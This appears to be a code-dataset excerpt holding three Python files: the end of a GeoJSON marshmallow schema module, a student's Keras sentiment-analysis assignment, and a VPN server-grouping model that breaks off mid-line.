\"\"\"\n\n type = fields.Str(validate=validate.Equal(\"Polygon\"), required=True)\n coordinates = fields.List(\n fields.List(\n fields.List(fields.Float(), validate=validate.Length(min=2, max=2)),\n validate=validate.Length(min=4),\n ),\n required=True,\n )\n bbox = fields.List(\n fields.Float(), validate=validate.Length(min=4), load_default=None\n )\n\n @post_load\n def make_obj(self, data, **kwargs) -> GeoJsonPolygon:\n return GeoJsonPolygon(**data)\n\n\n@dataclass\nclass GeoJsonMultiPolygon(GeoJsonGeometry):\n \"\"\"\n A GeoJSON MultiPolygon in 2D coordinates\n\n .. code-block::\n\n >>> import geojson\n >>> from geoschema.geojson_schemas import GeoJsonMultiPolygon\n\n >>> data = {\"type\": \"MultiPolygon\", \"coordinates\": [[[[3.78, 9.28], [-130.91, 1.52], [35.12, 72.234], [3.78, 9.28]]], [[[23.18, -34.29], [-1.31, -4.61], [3.41, 77.91], [23.18, -34.29]]]]}\n >>> geojson_polygons = GeoJsonMultiPolygon(**data)\n >>> geojson_polygons\n GeoJsonMultiPolygon(type='MultiPolygon', coordinates=[[[[3.78, 9.28], [-130.91, 1.52], [35.12, 72.234], [3.78, 9.28]]], [[[23.18, -34.29], [-1.31, -4.61], [3.41, 77.91], [23.18, -34.29]]]], bbox=[-130.91, -34.29, 35.12, 77.91])\n >>> geojson.dumps(geojson_polygons)\n '{\"type\": \"MultiPolygon\", \"coordinates\": [[[[3.78, 9.28], [-130.91, 1.52], [35.12, 72.234], [3.78, 9.28]]], [[[23.18, -34.29], [-1.31, -4.61], [3.41, 77.91], [23.18, -34.29]]]], \"bbox\": [-130.91, -34.29, 35.12, 77.91]}'\n >>> geojson_polygons.shape\n \n\n .. seealso::\n - https://geojson.org/schema/MultiPolygon.json\n - https://tools.ietf.org/html/rfc7946#section-3.1.7\n \"\"\"\n\n type: str = \"MultiPolygon\"\n coordinates: List[List[List[List[float]]]] = None\n bbox: List[float] = None\n\n def __post_init__(self):\n polygons = [\n shapely.geometry.Polygon(polygon[0], polygon[1:])\n for polygon in self.coordinates\n ]\n self._shape = shapely.geometry.MultiPolygon(polygons)\n self.bbox = list(self._shape.bounds)\n\n @property\n def shape(self) -> shapely.geometry.MultiPolygon:\n return self._shape\n\n\nclass GeoJsonMultiPolygonSchema(Schema):\n \"\"\"\n A GeoJSON MultiPolygon schema in 2D coordinates\n\n .. code-block::\n\n import geojson\n from geoschema.geojson_schemas import GeoJsonMultiPolygon\n from geoschema.geojson_schemas import GeoJsonMultiPolygonSchema\n\n polygons = geojson.MultiPolygon(\n [\n ([(3.78, 9.28), (-130.91, 1.52), (35.12, 72.234), (3.78, 9.28)],),\n ([(23.18, -34.29), (-1.31, -4.61), (3.41, 77.91), (23.18, -34.29)],),\n ]\n )\n assert isinstance(polygons, geojson.geometry.MultiPolygon)\n assert isinstance(polygons, dict) # it is also a dict\n polygon_schema = GeoJsonMultiPolygonSchema()\n geojson_polygons = polygon_schema.load(polygons) # load a geojson dict\n assert isinstance(geojson_polygons, GeoJsonMultiPolygon)\n geojson_dump = geojson.dumps(polygons)\n geojson_polygons = polygon_schema.loads(geojson_dump) # load a geojson string\n assert isinstance(geojson_polygons, GeoJsonMultiPolygon)\n serialized = geojson.dumps(geojson_polygons)\n\n .. seealso::\n - https://geojson.org/schema/MultiPolygon.json\n - https://tools.ietf.org/html/rfc7946#section-3.1.7\n \"\"\"\n\n type = fields.Str(validate=validate.Equal(\"MultiPolygon\"), required=True)\n coordinates = fields.List(\n fields.List(\n fields.List(\n fields.List(fields.Float(), validate=validate.Length(min=2, max=2)),\n validate=validate.Length(min=4),\n ),\n ),\n required=True,\n )\n bbox = fields.List(\n fields.Float(), validate=validate.Length(min=4), load_default=None\n )\n\n @post_load\n def make_obj(self, data, **kwargs) -> GeoJsonMultiPolygon:\n return GeoJsonMultiPolygon(**data)\n\n\nGEOMETRY_SCHEMAS = [\n GeoJsonPointSchema(),\n GeoJsonLineStringSchema(),\n GeoJsonPolygonSchema(),\n GeoJsonMultiPointSchema(),\n GeoJsonMultiLineStringSchema(),\n GeoJsonMultiPolygonSchema(),\n]\n\nGEOMETRY_TYPES = [\n GeoJsonPoint,\n GeoJsonLineString,\n GeoJsonPolygon,\n GeoJsonMultiPoint,\n GeoJsonMultiLineString,\n GeoJsonMultiPolygon,\n]\n\n\ndef parse_geometry(\n geometry: Dict,\n) -> Union[\n None,\n GeoJsonGeometry,\n GeoJsonPoint,\n GeoJsonMultiPoint,\n GeoJsonLineString,\n GeoJsonMultiLineString,\n GeoJsonPolygon,\n GeoJsonMultiPolygon,\n]:\n if isinstance(geometry, GeoJsonGeometry):\n return geometry\n\n if isinstance(geometry, str):\n geometry = geojson.loads(geometry)\n\n if isinstance(geometry, Dict):\n for schema in GEOMETRY_SCHEMAS:\n try:\n return schema.load(geometry)\n except ValidationError:\n pass\n\n LOGGER.warning(\"Unknown geometry: %s\", geometry)\n\n\ndef parse_geometries(\n geometries: List,\n) -> List[\n Union[\n None,\n GeoJsonGeometry,\n GeoJsonPoint,\n GeoJsonMultiPoint,\n GeoJsonLineString,\n GeoJsonMultiLineString,\n GeoJsonPolygon,\n GeoJsonMultiPolygon,\n ]\n]:\n shapes = map(parse_geometry, geometries)\n return [shape for shape in shapes if shape is not None]\n\n\nclass GeoJsonGeometryField(fields.Field):\n \"\"\"\n A GeoJSON Geometry Field\n \"\"\"\n\n def _serialize(self, value, attr, obj, **kwargs) -> Dict:\n \"\"\"\n Serialize a GeoJSON Geometry Field into a GeoJSON Dict\n\n :param value: value is assumed to be a GeoJSON Geometry Field\n :param attr:\n :param obj:\n :param kwargs:\n :return: GeoJSON Dict representation for the Geometry Field\n \"\"\"\n if isinstance(value, GeoJsonGeometry):\n return value.to_dict()\n return geojson.loads(geojson.dumps(value))\n\n def _deserialize(\n self, value, attr, data, **kwargs\n ) -> Union[\n GeoJsonPoint,\n GeoJsonMultiPoint,\n GeoJsonLineString,\n GeoJsonMultiLineString,\n GeoJsonPolygon,\n GeoJsonMultiPolygon,\n ]:\n \"\"\"\n Parse a GeoJSON Geometry string into a GeoJSON Geometry Field\n\n :param value: value is assumed to be a GeoJSON Geometry string\n :param attr:\n :param obj:\n :param kwargs:\n :return: any one of the GeoJSON Geometry Field types\n \"\"\"\n try:\n geometry = parse_geometry(value)\n if geometry is None:\n raise ValueError(\"Unknown geometry data.\")\n return geometry\n except ValueError as error:\n raise ValidationError(\"Unknown geometry data.\") from error\n\n\n@dataclass\nclass GeoJsonGeometryCollection:\n \"\"\"\n A GeoJSON GeometryCollection in 2D coordinates\n\n .. code-block::\n\n >>> import geojson\n >>> from geoschema.geojson_schemas import GeoJsonGeometryCollection\n\n >>> data = {\n \"type\": \"GeometryCollection\",\n \"geometries\": [\n {\n \"type\": \"Point\",\n \"coordinates\": [-115.81, 37.24]\n },\n {\n \"type\": \"LineString\",\n \"coordinates\": [[-152.62, 51.21], [5.21, 10.69]]\n }\n ]\n }\n >>> geo_collection = GeoJsonGeometryCollection(**data)\n >>> assert isinstance(geo_collection, GeoJsonGeometryCollection)\n >>> geojson.dumps(geo_collection)\n '{\"type\": \"GeometryCollection\", \"geometries\": [{\"type\": \"Point\", \"bbox\": [-115.81, 37.24, -115.81, 37.24], \"coordinates\": [-115.81, 37.24]}, {\"type\": \"LineString\", \"bbox\": [-152.62, 10.69, 5.21, 51.21], \"coordinates\": [[-152.62, 51.21], [5.21, 10.69]]}], \"bbox\": [-152.62, 10.69, 5.21, 51.21]}'\n >>> geo_collection.shape\n \n\n\n .. seealso::\n - https://geojson.org/schema/GeometryCollection.json\n - https://tools.ietf.org/html/rfc7946#section-3.1.8\n \"\"\"\n\n type: str = \"GeometryCollection\"\n geometries: List[\n Union[\n str,\n GeoJsonGeometry,\n GeoJsonPoint,\n GeoJsonMultiPoint,\n GeoJsonLineString,\n GeoJsonMultiLineString,\n GeoJsonPolygon,\n GeoJsonMultiPolygon,\n ]\n ] = None\n bbox: List[float] = None\n\n def __post_init__(self):\n self.geometries = parse_geometries(self.geometries)\n shapes = [s.shape for s in self.geometries]\n self._shape = shapely.geometry.GeometryCollection(shapes)\n self.bbox = list(self._shape.bounds)\n\n @property\n def __geo_interface__(self) -> Dict:\n return self.to_dict()\n\n @property\n def shape(self) -> shapely.geometry.GeometryCollection:\n return self._shape\n\n def to_dict(self) -> Dict:\n return {\"type\": self.type, \"geometries\": self.geometries, \"bbox\": self.bbox}\n\n\nclass GeoJsonGeometryCollectionSchema(Schema):\n \"\"\"\n A GeoJSON GeometryCollection schema in 2D coordinates\n\n .. code-block::\n\n >>> import geojson\n >>> from geoschema.geojson_schemas import GeoJsonGeometryCollection\n >>> from geoschema.geojson_schemas import GeoJsonGeometryCollectionSchema\n\n >>> data = {\n \"type\": \"GeometryCollection\",\n \"geometries\": [\n {\n \"type\": \"Point\",\n \"coordinates\": [-115.81, 37.24]\n },\n {\n \"type\": \"LineString\",\n \"coordinates\": [[-152.62, 51.21], [5.21, 10.69]]\n }\n ]\n }\n >>> schema = GeoJsonGeometryCollectionSchema()\n >>> geo_collection = schema.load(geo_collection) # load a geojson dict\n >>> assert isinstance(geo_collection, GeoJsonGeometryCollection)\n >>> geojson.dumps(geo_collection)\n '{\"type\": \"GeometryCollection\", \"geometries\": [{\"type\": \"Point\", \"bbox\": [-115.81, 37.24, -115.81, 37.24], \"coordinates\": [-115.81, 37.24]}, {\"type\": \"LineString\", \"bbox\": [-152.62, 10.69, 5.21, 51.21], \"coordinates\": [[-152.62, 51.21], [5.21, 10.69]]}], \"bbox\": [-152.62, 10.69, 5.21, 51.21]}'\n\n\n .. seealso::\n - https://geojson.org/schema/GeometryCollection.json\n - https://tools.ietf.org/html/rfc7946#section-3.1.8\n \"\"\"\n\n type = fields.Str(validate=validate.Equal(\"GeometryCollection\"), required=True)\n # geometries = fields.List(fields.Dict(), many=True, required=True)\n geometries = fields.List(GeoJsonGeometryField(), required=True)\n bbox = fields.List(\n fields.Float(), validate=validate.Length(min=4), load_default=None\n )\n\n @post_load\n def make_obj(self, data, **kwargs) -> GeoJsonGeometryCollection:\n return GeoJsonGeometryCollection(**data)\n\n\n@dataclass\nclass GeoJsonFeature:\n type: str = \"Feature\"\n geometry: Union[\n Dict,\n GeoJsonPoint,\n GeoJsonMultiPoint,\n GeoJsonLineString,\n GeoJsonMultiLineString,\n GeoJsonPolygon,\n GeoJsonMultiPolygon,\n ] = None\n properties: Dict = None\n\n def __post_init__(self):\n self.geometry = parse_geometry(self.geometry)\n self.bbox = list(self.geometry.shape.bounds)\n\n @property\n def __geo_interface__(self) -> Dict:\n return {\n \"type\": self.type,\n \"geometry\": self.geometry,\n \"properties\": self.properties,\n }\n\n @property\n def shape(\n self,\n ) -> Union[\n shapely.geometry.Point,\n shapely.geometry.MultiPoint,\n shapely.geometry.LineString,\n shapely.geometry.MultiLineString,\n shapely.geometry.Polygon,\n shapely.geometry.MultiPolygon,\n ]:\n return self.geometry.shape\n\n\nclass GeoJsonFeatureSchema(Schema):\n id = fields.Str() # optional\n type = fields.Str(required=True, validate=validate.Equal(\"Feature\"))\n # geometry = fields.Dict(required=True)\n geometry = GeoJsonGeometryField(required=True)\n properties = fields.Dict(required=True)\n\n @post_load\n def make_obj(self, data, **kwargs) -> GeoJsonFeature:\n return GeoJsonFeature(**data)\n\n\n@dataclass\nclass GeoJsonFeatureCollection:\n type: str = \"FeatureCollection\"\n features: List[Union[Dict, GeoJsonFeature]] = None\n\n @property\n def __geo_interface__(self) -> Dict:\n return self.to_dict()\n\n @property\n def shapes(\n self,\n ) -> List[\n Union[\n shapely.geometry.Point,\n shapely.geometry.MultiPoint,\n shapely.geometry.LineString,\n shapely.geometry.MultiLineString,\n shapely.geometry.Polygon,\n shapely.geometry.MultiPolygon,\n ]\n ]:\n return [f.geometry.shape for f in self.features]\n\n def to_dict(self) -> Dict:\n return {\"type\": self.type, \"features\": self.features}\n\n\nclass GeoJsonFeatureCollectionSchema(Schema):\n type = fields.Str(required=True, validate=validate.Equal(\"FeatureCollection\"))\n features = fields.Nested(GeoJsonFeatureSchema(many=True), required=True)\n\n @post_load\n def make_obj(self, data, **kwargs) -> GeoJsonFeatureCollection:\n return GeoJsonFeatureCollection(**data)\n","repo_name":"dazza-codes/geoschema","sub_path":"geoschema/geojson_schemas.py","file_name":"geojson_schemas.py","file_ext":"py","file_size_in_byte":29155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39747919303","text":"# ADD THE LIBRARIES YOU'LL NEED\nimport pandas as pd\nfrom keras import Input\nfrom keras.layers import Dropout\nfrom keras.layers import Dense\nfrom gensim.models import FastText\nimport fasttext\nimport fasttext.util\nfrom tensorflow.keras import Sequential\nfrom keras.layers.embeddings import Embedding\nfrom keras.layers import LSTM\nfrom keras.layers import Flatten\nfrom keras.initializers import Constant\nfrom keras.models import model_from_json\nimport tensorflow as tf\nfrom imblearn.under_sampling import RandomUnderSampler\nfrom keras.preprocessing import sequence\nimport numpy as np\nimport nltk\nimport json\nfrom nltk.corpus import stopwords \nfrom nltk.tokenize import word_tokenize \nfrom keras.layers import Activation\nfrom keras import backend as K\nfrom gensim.models import Word2Vec\nfrom sklearn.datasets import make_blobs\nfrom sklearn.model_selection import train_test_split\nimport imblearn\nfrom imblearn.over_sampling import RandomOverSampler\n#from sklearn.utils import class_weight\n#from imblearn.over_sampling import SMOTE\nfrom imblearn.under_sampling import RandomUnderSampler\n'''\nAbout the task:\n\nYou are provided with a codeflow- which consists of functions to be implemented(MANDATORY).\n\nYou need to implement each of the functions mentioned below, you may add your own function parameters if needed(not to main).\nExecute your code using the provided auto.py script(NO EDITS PERMITTED) as your code will be evaluated using an auto-grader.\n'''\n\nvocab_embedding=dict()\n\ndef over_sample_data(train):\n oversample = RandomOverSampler(random_state=777)\n X_over, y_over = oversample.fit_resample(train[['reviews','ratings']], train['ratings'])\n #print(len(y_over))\n #X_over,y_over=smote.fit_sample(train['reviews'],train['ratings'])\n #X_over, y_over = undersample.fit_resample(train[['reviews','ratings']], train['ratings'])\n columnnames=['reviews','ratings']\n df = pd.DataFrame(X_over, columns=columnnames)\n df['ratings'].value_counts()\n train=df\n train = train.sample(frac=1).reset_index(drop=True)\n #reviews=train['reviews']\n #ratings=train['ratings']\n return train\n\ndef under_sample_data(train):\n undersample = RandomUnderSampler(random_state=777)\n X_over, y_over = undersample.fit_resample(train[['reviews','ratings']], train['ratings'])\n columnnames=['reviews','ratings']\n df = pd.DataFrame(X_over, columns=columnnames)\n df['ratings'].value_counts()\n train=df\n train = train.sample(frac=1).reset_index(drop=True)\n return train\n\n\ndef pre_process_rating(data):\n ratings = data[\"ratings\"].values.tolist()\n ratings1=list()\n for rating in ratings:\n replace_list=[0,0,0,0,0]\n replace_list[rating-1]=1\n ratings1.append(replace_list)\n ratings=ratings1\n #ratings=[x-1 for x in ratings]\n return ratings\n\ndef encode_data(text):\n reviews=text\n vocab=dict()\n for elem in reviews:\n for words in elem:\n if words in vocab:\n vocab[words]+=1\n else:\n vocab[words]=1\n with open('./vocab.json') as json_file: \n vocab_sorted = json.load(json_file)\n\n \n \n #f=open('/content/drive/MyDrive/NLP_Assignment1/glove.twitter.27B.200d.txt')\n #for line in f:\n # line=line.split(' ')\n #print(line[0])\n # vocab_embedding[line[0]]=np.asarray(line[1:],dtype='float32').tolist()\n reviews1=list()\n replace_data=list()\n #print(reviews[0])\n #print(reviews[100])\n for elem in reviews:\n replace_data=list()\n for word in elem:\n if(word in vocab_sorted):\n replace_data.append(vocab_sorted[word])\n reviews1.append(replace_data)\n reviews=reviews1\n return reviews\n #len(vocab)\n\n # This function will be used to encode the reviews using a dictionary(created using corpus vocabulary) \n \n # Example of encoding :\"The food was fabulous but pricey\" has a vocabulary of 4 words, each one has to be mapped to an integer like: \n # {'The':1,'food':2,'was':3 'fabulous':4 'but':5 'pricey':6} this vocabulary has to be created for the entire corpus and then be used to \n # encode the words into integers \n\n # return encoded examples\n\n\n\ndef convert_to_lower(text):\n reviews=text\n reviews1=list()\n for elem in reviews:\n reviews1.append(elem.lower())\n reviews=reviews1\n reviews_orignal=reviews\n return reviews \n # return the reviews after convering then to lowercase\n\n\ndef remove_punctuation(text):\n reviews=text\n punc = '''!()-[]{};:'\"\\,<>./?@#$%^&*_~+=\\`'''\n reviews1=list()\n for elem in reviews:\n for char in elem:\n if(char in punc):\n elem=elem.replace(char,\"\")\n reviews1.append(elem)\n reviews=reviews1\n return reviews\n # return the reviews after removing punctuations\n\n\ndef remove_stopwords(text):\n #stop_words = set(stopwords.words('english')) \n return text\n # return the reviews after removing the stopwords\n\ndef perform_tokenization(text):\n reviews=text\n nltk.download('punkt')\n reviews1=list()\n review=list()\n for elem in reviews:\n print(elem)\n review=word_tokenize(elem)\n reviews1.append(review)\n reviews=reviews1\n return reviews\n # return the reviews after performing tokenization\n\n\ndef perform_padding(data):\n reviews=data\n review_length=29\n print(review_length)\n reviews= sequence.pad_sequences(reviews, maxlen=review_length,padding=\"post\")\n #print(reviews[2])\n #reviews.shape\n return reviews\n # return the reviews after padding the reviews to maximum length\n\ndef preprocess_data(data,is_train=True):\n # make all the following function calls on your data\n # EXAMPLE:->\n \n if(is_train): \n review = data[\"reviews\"].values.tolist()\n else:\n review=data\n review = convert_to_lower(review)\n review = remove_punctuation(review)\n review = remove_stopwords(review)\n review = perform_tokenization(review)\n review = encode_data(review)\n review = perform_padding(review)\n \n return review\n\n\n\ndef softmax_activation(x):\n num=K.exp(x-K.reshape(K.max(x,axis=1),(K.shape(x)[0],1)))\n norm=K.reshape(K.sum(num,axis=1),(K.shape(x)[0],1))\n return num/norm\n # write your own implementation from scratch and return softmax values(using predefined softmax is prohibited)\n\n\n\nclass NeuralNet:\n\n def __init__(self, reviews, ratings):\n\n self.reviews = reviews\n self.ratings = ratings\n\n\n\n def build_nn(self):\n with open('./vocab.json') as json_file: \n vocab_sorted = json.load(json_file)\n vocab_size=len(vocab_sorted)\n #vocab=model\n vocab_embedding = fasttext.load_model('./crawl-300d-2M-subword/crawl-300d-2M-subword.bin')\n embedding_dim=300\n embedding_matrix=np.zeros((vocab_size+1, embedding_dim))\n i=1\n for words in vocab_sorted:\n #print(vocab_sorted['intelligent'])\n vector=vocab_embedding.get_word_vector(word=words)\n #vector=vocab.get(word)\n #if word in vocab.wv.vocab:\n # vector=vocab[word]\n if vector is not None:\n embedding_matrix[i]=vector\n i+=1\n #print(embedding_matrix[18])\n #print(embedding_matrix[19])\n #print(vocab)\n\n self.model = Sequential()\n self.model.add(Input(shape=(29,)))\n self.model.add(Embedding(vocab_size+1,embedding_dim,input_length=29,trainable=True,embeddings_initializer=Constant(embedding_matrix)))\n #model.add(Embedding(vocab_size+1,embedding_dim,input_length=1000))\n #model.add(LSTM(100))\n self.model.add(Dropout(0.7))\n self.model.add(Flatten())\n self.model.add(Dense(50,activation='sigmoid'))\n self.model.add(Dropout(0.5))\n #model.add(Dense(70,activation='sigmoid'))\n #model.add(Dropout(0.5))\n #model.add(Dense(25,activation='relu'))\n #model.add(Dropout(0.5))\n self.model.add(Dense(5,activation=softmax_activation))\n self.model.compile(optimizer='adam',loss='categorical_crossentropy',metrics=['accuracy'])\n #add the input and output layer here; you can use either tensorflow or pytorch\n\n def train_nn(self,batch_size,epochs):\n reviews_train, reviews_test, ratings_train, ratings_test = train_test_split(self.reviews, self.ratings, train_size=0.75)\n self.model.fit(np.array(reviews_train),np.array(ratings_train),epochs=2,batch_size=256,validation_data=(np.array(reviews_test),np.array(ratings_test)))\n\n # write the training loop here; you can use either tensorflow or pytorch\n # print validation accuracy\n\n def predict(self, reviews):\n #test_reviews=pre_process_rating(reviews)\n return np.argmax(self.model.predict(np.array(reviews)),axis=-1)\n # return a list containing all the ratings predicted by the trained model\n\n\n \n# DO NOT MODIFY MAIN FUNCTION'S PARAMETERS\ndef main(train_file, test_file):\n \n batch_size,epochs=128,50\n train_data=pd.read_csv(train_file)\n test_data=pd.read_csv(test_file)\n train_data=over_sample_data(train_data)\n train_reviews=preprocess_data(train_data)\n test_reviews=preprocess_data(test_data)\n train_ratings=pre_process_rating(train_data)\n test_ratings=pre_process_rating(test_data)\n\n model=NeuralNet(train_reviews,train_ratings)\n model.build_nn()\n model.train_nn(batch_size,epochs)\n\n return model.predict(test_reviews)\n#main('train','test')","repo_name":"pranjalsaini24/Sentiment-Analysis","sub_path":"Assignment_2/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":9153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22496833457","text":"import random\nimport logging\nimport os\nimport json\nfrom config.paths import CONFIG_DIR\nfrom .vpn_config import VPNServerConfig\nfrom pyhtmlgui import ObservableDict, Observable\n\n\n# common for Servers and Server Collections\nclass VpnServerOrGroup(Observable):\n def __init__(self, name):\n super().__init__()\n self._logger = logging.getLogger(self.__class__.__name__)\n self.name = name\n self.identifier = None\n self.bandwidth_in = 0\n self.bandwidth_out = 0\n self.bandwidth_max = 0\n self.last_connection_failed = False\n\n @property\n def is_online(self):\n return self.bandwidth_in >= 0 and self.bandwidth_out >= 0 and self.bandwidth_max >= 0\n\n @property\n def bandwidth_used_mbit(self):\n if self.bandwidth_in < 0 or self.bandwidth_out < 0:\n return 0\n return ( self.bandwidth_in + self.bandwidth_out ) / 2\n\n @property\n def bandwidth_used_percent(self):\n return min( int( 100 / self.bandwidth_max * self.bandwidth_used_mbit), 100)\n\n @property\n def bandwidth_available_percent(self):\n if self.bandwidth_in < 0 and self.bandwidth_out < 0:\n return 0\n return 100 - self.bandwidth_used_percent\n\n @property\n def country_shortcodes(self):\n return list(set([s.vpn_server_config.country_shortcode for s in self.get_vpn_servers()]))\n\n def match_identifier(self, identifier):\n if self.identifier == identifier:\n return True\n return False\n\n def set_bandwidth(self, bandwidth_in, bandwidth_out, bandwidth_max):\n changed = False\n if self.bandwidth_in != bandwidth_in:\n self.bandwidth_in = bandwidth_in\n changed = True\n if self.bandwidth_out != bandwidth_out:\n self.bandwidth_out = bandwidth_out\n changed = True\n if self.bandwidth_max != bandwidth_max:\n self.bandwidth_max = bandwidth_max\n changed = True\n if changed is True:\n self.notify_observers()\n\n def get_vpn_servers(self):\n raise NotImplementedError()\n\n\n# One VPN Server\nclass VpnServer(VpnServerOrGroup):\n def __init__(self, name):\n super().__init__(name)\n self.name = name\n self.identifier = \"server=%s\" % name\n self.vpn_server_config = None\n\n def add_config(self, vpnConfig):\n self.vpn_server_config = vpnConfig\n self.bandwidth_max = vpnConfig.bandwidth_mbps\n self.notify_observers()\n\n def search_by_identifier(self, identifer):\n if self.match_identifier(identifer):\n return self\n return None\n\n def match_filter(self, filter):\n filter = filter.lower()\n if self.name.lower().find(filter) != -1:\n return True\n if self.vpn_server_config.country_name.lower().find(filter) != -1:\n return True\n if self.vpn_server_config.city.lower().find(filter) != -1:\n return True\n if self.vpn_server_config.hostname.lower().find(filter) != -1:\n return True\n if self.vpn_server_config.groupname.lower().find(filter) != -1:\n return True\n return False\n\n def __repr__(self, prefix=\"\"):\n s = prefix + 'VPN Server %s\\n' % self.name\n return s\n\n def get_vpn_servers(self):\n \"\"\"\n :rtype: list[VpnServer]\n \"\"\"\n return [self]\n\n def get_ipv6s(self):\n return [ self.vpn_server_config.primary_ipv6 ] + self.vpn_server_config.alternative_ipv6\n def get_ipv4s(self):\n return [ self.vpn_server_config.primary_ipv4 ] + self.vpn_server_config.alternative_ipv4\n\n def __len__(self):\n return 1\n\n\n# common for collections of Servers\nclass VpnGroup(VpnServerOrGroup):\n def __init__(self, name):\n super().__init__(name)\n self.name = name\n self.identifier = None\n\n @property\n def subitems(self):\n raise NotImplementedError()\n\n def search_by_identifier(self, identifer):\n if self.match_identifier(identifer):\n return self\n if identifer in self.subitems.keys():\n return self.subitems[identifer]\n for _, subitem in self.subitems.items():\n r = subitem.search_by_identifier(identifer)\n if r is not None:\n return r\n return None\n\n def match_filter(self, filter):\n for _, subitem in self.subitems.items():\n if subitem.match_filter(filter) is True:\n return True\n return False\n\n def get_vpn_servers(self):\n \"\"\"\n :rtype: list[VpnServer]\n \"\"\"\n servers = []\n for _, subitem in self.subitems.items():\n servers.extend(subitem.get_vpn_servers())\n return servers\n\n def get_ipv6s(self):\n r = []\n for server in self.get_vpn_servers():\n r.extend(server.get_ipv6s())\n return r\n\n def get_ipv4s(self):\n r = []\n for server in self.get_vpn_servers():\n r.extend(server.get_ipv4s())\n return r\n\n\n def __len__(self):\n return len(self.subitems)\n\n\n# the actual server group classes.\n# instanciate Planet, use add_config for add VpnServer config file objects\nclass VpnGroupCity(VpnGroup):\n def __init__(self, name):\n super().__init__(name)\n self.name = name\n self.identifier = \"city=%s\" % name\n self.servers = ObservableDict() # server key is hostname\n\n @property\n def subitems(self):\n return self.servers\n\n def add_config(self, vpnConfig):\n if vpnConfig.hostname not in self.servers:\n self.servers[vpnConfig.hostname] = VpnServer(vpnConfig.hostname)\n self.servers[vpnConfig.hostname].attach_observer(self._on_server_updated)\n self.servers[vpnConfig.hostname].add_config(vpnConfig)\n\n def _on_server_updated(self, sender):\n self.set_bandwidth(\n -1 if len([_ for _,x in self.servers.items() if x.bandwidth_in >= 0]) == 0 else sum([x.bandwidth_in for _,x in self.servers.items() if x.bandwidth_in > 0]),\n -1 if len([_ for _,x in self.servers.items() if x.bandwidth_out >= 0]) == 0 else sum([x.bandwidth_out for _,x in self.servers.items() if x.bandwidth_out > 0]),\n -1 if len([_ for _,x in self.servers.items() if x.bandwidth_max >= 0]) == 0 else sum([x.bandwidth_max for _,x in self.servers.items() if x.bandwidth_max > 0])\n )\n\n def __repr__(self, prefix=\"\"):\n s = prefix + 'VPN City \"%s\", %s Servers\\n' % (self.name, self.subitems.__len__())\n for key, item in self.servers.items():\n s += item.__repr__(prefix + \" \")\n return s\n\n\nclass VpnGroupCountry(VpnGroup):\n def __init__(self, name):\n super().__init__(name)\n self.name = name\n self.identifier = \"country=%s\" % name\n self.citys = ObservableDict()\n self.servers = ObservableDict()\n\n\n @property\n def subitems(self):\n return self.citys\n\n def add_config(self, vpnConfig):\n if vpnConfig.city not in self.citys:\n self.citys[vpnConfig.city] = VpnGroupCity(vpnConfig.city)\n self.citys[vpnConfig.city].attach_observer(self._on_city_updated)\n self.citys[vpnConfig.city].add_config(vpnConfig)\n for _, item in self.citys.items():\n self.servers.update(item.servers)\n\n def _on_city_updated(self, sender):\n self.set_bandwidth(\n -1 if len([_ for _, x in self.citys.items() if x.bandwidth_in >= 0]) == 0 else sum([x.bandwidth_in for _, x in self.citys.items() if x.bandwidth_in > 0]),\n -1 if len([_ for _, x in self.citys.items() if x.bandwidth_out >= 0]) == 0 else sum([x.bandwidth_out for _, x in self.citys.items() if x.bandwidth_out > 0]),\n -1 if len([_ for _, x in self.citys.items() if x.bandwidth_max >= 0]) == 0 else sum([x.bandwidth_max for _, x in self.citys.items() if x.bandwidth_max > 0])\n )\n\n def __repr__(self, prefix=\"\"):\n s = prefix + 'VPN Country \"%s\", %s Citys\\n' % (self.name, self.subitems.__len__())\n for key, item in self.citys.items():\n s += item.__repr__(prefix + \" \")\n return s\n\n\nclass VpnGroupZone(VpnGroup):\n def __init__(self, name):\n super().__init__(name)\n self.name = name\n self.identifier = \"zone=%s\" % name\n self.countrys = ObservableDict()\n self.citys = ObservableDict()\n self.servers = ObservableDict()\n\n @property\n def subitems(self):\n return self.countrys\n\n def add_config(self, vpnConfig):\n if vpnConfig.country_name not in self.countrys:\n self.countrys[vpnConfig.country_name] = VpnGroupCountry(vpnConfig.country_name)\n self.countrys[vpnConfig.country_name].attach_observer(self._on_country_updated)\n self.countrys[vpnConfig.country_name].add_config(vpnConfig)\n\n for _, country in self.countrys.items():\n self.citys.update(country.citys)\n for _, city in country.citys.items():\n self.servers.update(city.servers)\n\n def _on_country_updated(self, sender):\n self.set_bandwidth(\n -1 if len([_ for _, x in self.countrys.items() if x.bandwidth_in >= 0]) == 0 else sum([x.bandwidth_in for _, x in self.countrys.items() if x.bandwidth_in > 0]),\n -1 if len([_ for _, x in self.countrys.items() if x.bandwidth_out >= 0]) == 0 else sum([x.bandwidth_out for _, x in self.countrys.items() if x.bandwidth_out > 0]),\n -1 if len([_ for _, x in self.countrys.items() if x.bandwidth_max >= 0]) == 0 else sum([x.bandwidth_max for _, x in self.countrys.items() if x.bandwidth_max > 0])\n )\n\n def __repr__(self, prefix=\"\"):\n s = prefix + 'VPN Zone \"%s\", %s Countrys\\n' % (self.name, self.subitems.__len__())\n for key, item in self.countrys.items():\n s += item.__repr__(prefix + \" \")\n return s\n\n\nclass VpnGroupPlanet(VpnGroup):\n def __init__(self, name=\"earth\"):\n super().__init__(name)\n self.name = name\n self.identifier = \"planet=%s\" % name\n self.zones = ObservableDict()\n self.countrys = ObservableDict()\n self.citys = ObservableDict()\n self.servers = ObservableDict()\n\n @property\n def subitems(self):\n return self.zones\n\n def add_config(self, vpnConfig):\n if vpnConfig.country_name not in self.zones:\n self.zones[vpnConfig.country_name] = VpnGroupZone(vpnConfig.country_name)\n self.zones[vpnConfig.country_name].attach_observer(self._on_zone_updated)\n self.zones[vpnConfig.country_name].add_config(vpnConfig)\n\n for _, zone in self.zones.items():\n self.countrys.update(zone.countrys)\n for _, country in zone.countrys.items():\n self.citys.update(country.citys)\n for _, city in country.citys.items():\n self.servers.update(city.servers)\n\n def add_bandwidth_data(self, data):\n for _, server in self.servers.items():\n key = server.vpn_server_config.url\n if key not in data and \"1.\" in key:\n key = key.replace(\"1.\",\".\")\n if key in data:\n server.set_bandwidth(\n -1 if int(data[key]['bandwidth_in']) < 0 else int(data[key]['bandwidth_in'] / 1000),\n -1 if 